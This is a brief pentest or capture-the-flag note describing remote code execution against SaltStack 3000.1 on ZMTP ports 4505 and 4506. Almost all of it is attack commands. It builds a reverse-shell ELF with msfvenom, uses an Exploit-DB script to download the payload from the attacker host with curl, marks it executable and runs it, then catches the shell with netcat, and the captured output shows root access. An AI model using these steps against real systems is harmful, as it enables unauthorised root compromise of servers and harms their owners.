Skip to content

zmtp 4505,4506

Saltstack 3000.1 - rce

https://www.exploit-db.com/exploits/48421

msfvenom -p linux/x86/shell_reverse_tcp LHOST=ip LPORT=4506 -f elf > shell.elf
python3 exploit.py --master ip --exec "curl ip:4505/shell.elf -o /tmp/shell"
python3 exploit.py --master ip --exec "chmod +x /tmp/shell"
python3 exploit.py --master ip --exec "/tmp/shell"
$ sudo nc -nvlp 4506            
listening on [any] 4506 ...
connect to [ip] from (UNKNOWN) [ip] 34288
id
uid=0(root) gid=0(root) groups=0(root)